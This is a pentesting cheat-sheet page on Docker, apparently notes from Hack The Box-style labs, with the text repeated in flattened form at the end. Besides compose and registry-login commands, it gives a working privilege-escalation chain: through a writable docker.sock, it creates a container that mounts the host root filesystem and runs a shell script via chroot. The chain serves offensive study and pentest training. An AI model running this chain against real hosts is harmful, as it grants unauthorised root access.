Docker

Configurations.

## ------------------| docker-compose.yaml
version: "3"                    ## optional since v1.27.0
services:                
    website:                    ## Service name
        image: nginx            
        ports:
            - "8080:80"
        restart: always         ## Alwasys start when machine reboot
       
         
## ------------------| Start/Stop
### Start/Run
sudo docker-compose up -d
### Stop/Down
sudo docker-compose stop
sudo docker-compose down

Is Docker Sock is writable ?

## ------------------| How to check
ls -al /var/run/docker.sock

## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/)
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json

## ------------------| Expolit chain 
### Create new container--> map root drive
### We need to know what image we can use; use following command and get RepoTags value.
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]' 

### Create json object in file !!! Remove comments!!!
{
    "Image" : "sandbox", ## <---- RepoTags value
    "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell
    "Binds" : [
        "/:/mnt:rw"
    ]
}

### use curl command to create new container
curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create           

### Get id value; replace; start
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start

## ------------------| Normal login
docker login <URL>

## ------------------| If it has certificate file
mkdir -p /etc/docker/certs.d/<url_name>
cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt
docker login <URL> 

cat /etc/docker/daemon.json 
{                                                                                                                                                                     
   "insecure-registries":["docker.registry.htb:443"]                                                                                                                      
}

PreviousAWS NextAzure AD

Last updated 2 years ago

## ------------------| docker-compose.yaml version: "3" ## optional since v1.27.0 services: website: ## Service name image: nginx ports: - "8080:80" restart: always ## Alwasys start when machine reboot ## ------------------| Start/Stop ### Start/Run sudo docker-compose up -d ### Stop/Down sudo docker-compose stop sudo docker-compose down

## ------------------| How to check ls -al /var/run/docker.sock ## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/) curl -s --unix-socket /var/run/docker.sock http://localhost/images/json curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json ## ------------------| Expolit chain ### Create new container--> map root drive ### We need to know what image we can use; use following command and get RepoTags value. curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]' ### Create json object in file !!! Remove comments!!! { "Image" : "sandbox", ## <---- RepoTags value "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell "Binds" : [ "/:/mnt:rw" ] } ### use curl command to create new container curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create ### Get id value; replace; start curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start

## ------------------| Normal login docker login <URL> ## ------------------| If it has certificate file mkdir -p /etc/docker/certs.d/<url_name> cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt docker login <URL> cat /etc/docker/daemon.json { "insecure-registries":["docker.registry.htb:443"] }